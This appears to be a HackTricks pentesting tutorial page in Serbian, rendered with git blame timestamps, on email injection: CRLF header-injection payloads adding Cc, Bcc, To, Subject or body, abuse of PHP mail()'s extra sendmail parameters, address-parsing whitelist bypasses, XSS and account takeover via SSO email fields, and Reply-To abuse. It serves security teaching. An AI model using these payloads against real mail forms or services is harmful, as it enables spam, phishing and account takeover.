hacktricks/pentesting-web/email-injections.md

171 lines
9.5 KiB
Markdown
Raw Normal View History

# Email Injections
2022-04-28 16:01:33 +00:00
<figure><img src="../.gitbook/assets/image (3) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
2022-08-31 22:35:39 +00:00
\
Koristite [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) da biste lako izgradili i **automatizovali radne tokove** pokretane najnaprednijim alatima zajednice.\
Pristupite danas:
2022-08-31 22:35:39 +00:00
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
2022-04-28 16:01:33 +00:00
<details>
2024-02-10 13:11:20 +00:00
<summary><strong>Naučite hakovanje AWS-a od nule do heroja sa</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
2022-04-28 16:01:33 +00:00
2024-02-10 13:11:20 +00:00
Drugi načini podrške HackTricks-u:
2023-12-31 01:25:17 +00:00
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** Proverite [**PLANOVE ZA PRETPLATU**](https://github.com/sponsors/carlospolop)!
2024-02-10 13:11:20 +00:00
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Podelite svoje hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
2022-04-28 16:01:33 +00:00
</details>
## Ubacivanje u poslati e-mail
2024-02-10 13:11:20 +00:00
### Ubacivanje Cc i Bcc nakon argumenta pošiljaoca
2021-11-27 01:09:08 +00:00
```
From:sender@domain.com%0ACc:recipient@domain.co,%0ABcc:recipient1@domain.com
```
Poruka će biti poslata na naloge primaoca i primaoca1.
### Ubacivanje argumenata
2021-11-27 01:09:08 +00:00
```
From:sender@domain.com%0ATo:attacker@domain.com
```
### Ubaci argument Predmet
Poruka će biti poslata originalnom primaocu i nalogu napadača.
2021-11-27 01:09:08 +00:00
```
2021-05-03 18:33:45 +00:00
From:sender@domain.com%0ASubject:This is%20Fake%20Subject
```
### Promena tela poruke
Ubacite dva reda razmaka, zatim napišite svoju poruku kako biste promenili telo poruke.
2021-11-27 01:09:08 +00:00
```
From:sender@domain.com%0A%0AMy%20New%20%0Fake%20Message.
```
2024-02-10 13:11:20 +00:00
### Iskorišćavanje funkcije PHP mail()
2021-11-27 01:09:08 +00:00
```bash
# The function has the following definition:
php --rf mail
Function [ <internal:standard> function mail ] {
2024-02-10 13:11:20 +00:00
- Parameters [5] {
Parameter #0 [ <required> $to ]
Parameter #1 [ <required> $subject ]
Parameter #2 [ <required> $message ]
Parameter #3 [ <optional> $additional_headers ]
Parameter #4 [ <optional> $additional_parameters ]
}
2021-11-27 01:09:08 +00:00
}
```
2024-02-10 13:11:20 +00:00
#### 5. parametar ($dodatni\_parametri)
2021-11-27 01:09:08 +00:00
Ova sekcija će se bazirati na **kako zloupotrebiti ovaj parametar pretpostavljajući da napadač ima kontrolu nad njim**.
2021-11-27 01:09:08 +00:00
Ovaj parametar će biti dodat u komandnu liniju koju će PHP koristiti za pozivanje binarnog sendmail-a. Međutim, biće saniran funkcijom `escapeshellcmd($dodatni_parametri)`.
2021-11-27 01:09:08 +00:00
2024-02-10 13:11:20 +00:00
Napadač može **ubaciti dodatne parametre za sendmail** u ovom slučaju.
2021-11-27 01:09:08 +00:00
2024-02-10 13:11:20 +00:00
#### Razlike u implementaciji /usr/sbin/sendmail
2021-11-27 01:09:08 +00:00
**sendmail** interfejs je **pružen od strane MTA softvera za e-poštu** (Sendmail, Postfix, Exim itd.) instaliranog na sistemu. Iako **osnovne funkcionalnosti** (kao što su -t -i -f parametri) ostaju **iste** iz razloga kompatibilnosti, **ostale funkcije i parametri** se razlikuju značajno u zavisnosti od instaliranog MTA.
2021-11-27 01:09:08 +00:00
2024-02-10 13:11:20 +00:00
Evo nekoliko primera različitih stranica sa uputstvima za sendmail komandu/interfejs:
2021-11-27 01:09:08 +00:00
* Sendmail MTA: http://www.sendmail.org/\~ca/email/man/sendmail.html
* Postfix MTA: http://www.postfix.org/mailq.1.html
* Exim MTA: https://linux.die.net/man/8/eximReferences
Zavisno od **porekla sendmail** binarnog fajla, otkrivene su različite opcije za zloupotrebu i **curenje fajlova ili čak izvršavanje proizvoljnih komandi**. Proverite kako na [**https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html**](https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html)
2021-11-27 01:09:08 +00:00
2024-02-10 13:11:20 +00:00
## Ubacivanje u ime e-pošte
2022-12-29 12:18:46 +00:00
2024-02-10 13:11:20 +00:00
### Ignorisani delovi e-pošte
2022-12-29 12:18:46 +00:00
Simboli: **+, -** i **{}** u retkim slučajevima mogu se koristiti za označavanje i biti ignorisani od strane većine e-poštanskih servera
2022-12-29 12:18:46 +00:00
2024-02-10 13:11:20 +00:00
* Npr. john.doe+intigriti@example.com → john.doe@example.com
2022-12-29 12:18:46 +00:00
2024-02-10 13:11:20 +00:00
**Komentari između zagrada ()** na početku ili kraju takođe će biti ignorisani
2022-12-29 12:18:46 +00:00
2024-02-10 13:11:20 +00:00
* Npr. john.doe(intigriti)@example.com → john.doe@example.com
2022-12-29 12:18:46 +00:00
### Bypass belih lista
2022-12-29 12:18:46 +00:00
<figure><img src="../.gitbook/assets/image (4) (6).png" alt="https://www.youtube.com/watch?app=desktop&#x26;v=4ZsTKvfP1g0"><figcaption></figcaption></figure>
2022-12-29 12:18:46 +00:00
2024-02-10 13:11:20 +00:00
### Navodnici
2022-12-29 12:18:46 +00:00
<figure><img src="../.gitbook/assets/image (6) (4).png" alt="https://www.youtube.com/watch?app=desktop&#x26;v=4ZsTKvfP1g0"><figcaption></figcaption></figure>
2022-12-29 12:18:46 +00:00
2024-02-10 13:11:20 +00:00
### IP adrese
2022-12-29 12:18:46 +00:00
Takođe možete koristiti IP adrese kao imena domena između uglatih zagrada:
2022-12-29 12:18:46 +00:00
* john.doe@\[127.0.0.1]
* john.doe@\[IPv6:2001:db8::1]
2024-02-10 13:11:20 +00:00
### Ostale ranjivosti
2022-12-29 12:18:46 +00:00
![https://www.youtube.com/watch?app=desktop\&v=4ZsTKvfP1g0](<../.gitbook/assets/image (296).png>)
2022-12-29 12:18:46 +00:00
2024-02-10 13:11:20 +00:00
## SSO treće strane
2022-12-29 12:18:46 +00:00
### XSS
Neke usluge poput **github** ili **salesforce dozvoljavaju** vam da kreirate **e-adresu sa XSS payload-om**. Ako možete **koristiti ove provajdere za prijavu na druge usluge** i ove usluge **ne saniraju** ispravno e-poštu, možete izazvati **XSS**.
2022-12-29 12:18:46 +00:00
2024-02-10 13:11:20 +00:00
### Preuzimanje naloga
2022-12-29 12:18:46 +00:00
Ako **SSO usluga** dozvoljava da **kreirate nalog bez provere date e-adrese** (kao što je **salesforce**) i zatim možete koristiti taj nalog za **prijavu na drugu uslugu** koja **veruje** salesforce-u, možete pristupiti bilo kom nalogu.\
_Napomena da salesforce označava da li je data e-adresa verifikovana ili ne, tako da bi aplikacija trebalo da uzme u obzir ovu informaciju._
2022-12-29 12:18:46 +00:00
## Odgovori
2022-12-29 12:18:46 +00:00
Možete poslati e-poštu koristeći _**Od: company.com**_ i _**Odgovori: napadac.com**_ i ako se bilo koji **automatski odgovor** pošalje zbog toga što je e-pošta poslata **sa** interne adrese, **napadač** može biti u mogućnosti da **primi** taj **odgovor**.
2022-12-29 12:18:46 +00:00
2024-02-10 13:11:20 +00:00
## Stopa tvrdog odbijanja
2022-12-29 12:18:46 +00:00
2024-02-10 13:11:20 +00:00
Određene usluge, poput AWS-a, implementiraju prag poznat kao **Stopa tvrdog odbijanja**, obično postavljen na 10%. Ovo je ključna metrika, posebno za usluge isporuke e-pošte. Kada se ova stopa premaši, usluga, poput AWS-ove usluge e-pošte, može biti suspendovana ili blokirana.
2022-12-29 12:18:46 +00:00
**Tvrdi odbijanje** se odnosi na **e-poštu** koja je vraćena pošiljaocu jer je adresa primaoca nevažeća ili ne postoji. Ovo se može dogoditi iz različitih razloga, kao što je slanje e-pošte na nevažeću adresu, domen koji nije stvaran ili odbijanje servera primaoca da prihvati **e-poruke**.
2022-12-29 12:18:46 +00:00
U kontekstu AWS-a, ako pošaljete 1000 e-poruka i 100 od njih rezultira tvrdim odbijanjem (zbog razloga poput nevažećih adresa ili domena), to bi značilo stopu tvrdog odbijanja od 10%. Dostizanje ili premašivanje ove stope može pokrenuti blokiranje ili suspenziju vaših sposobnosti slanja e-pošte putem AWS SES (Jednostavna usluga e-pošte).
2024-02-05 20:00:40 +00:00
Važno je održavati nisku stopu tvrdog odbijanja kako bi se osigurala neprekidna usluga e-pošte i očuvala reputacija pošiljaoca. Praćenje i upravljanje kvalitetom adresa e-pošte na vašim listama za slanje može značajno pomoći u postizanju ovog cilja.
2024-02-05 20:00:40 +00:00
Za detaljnije informacije, može se pogledati zvanična dokumentacija AWS-a o postupanju sa odbijanjima i prigovorima na [AWS SES Postupanje sa odbijanjima](https://docs.aws.amazon.com/ses/latest/DeveloperGuide/notification-contents.html#bounce-types).
2022-12-29 12:18:46 +00:00
2024-02-10 13:11:20 +00:00
## Reference
2021-11-27 01:09:08 +00:00
2022-12-29 12:18:46 +00:00
* [https://resources.infosecinstitute.com/email-injection/](https://resources.infosecinstitute.com/email-injection/)
* [https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html](https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html)
* [https://drive.google.com/file/d/1iKL6wbp3yYwOmxEtAg1jEmuOf8RM8ty9/view](https://drive.google.com/file/d/1iKL6wbp3yYwOmxEtAg1jEmuOf8RM8ty9/view)
* [https://www.youtube.com/watch?app=desktop\&v=4ZsTKvfP1g0](https://www.youtube.com/watch?app=desktop\&v=4ZsTKvfP1g0)
2022-04-28 16:01:33 +00:00
<details>
2024-02-10 13:11:20 +00:00
<summary><strong>Naučite hakovanje AWS-a od nule do heroja sa</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
2023-12-31 01:25:17 +00:00
2024-02-10 13:11:20 +00:00
Drugi načini podrške HackTricks-u:
2022-04-28 16:01:33 +00:00
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** Proverite [**PLANOVE ZA PRETPLATU**](https://github.com/sponsors/carlospolop)!
2024-02-10 13:11:20 +00:00
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
</details>
<figure><img src="../.gitbook/assets/image (3) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\
Koristite [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) da lako kreirate i **automatizujete radne tokove** pokretane najnaprednijim alatima zajednice.\
Pristupite danas:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}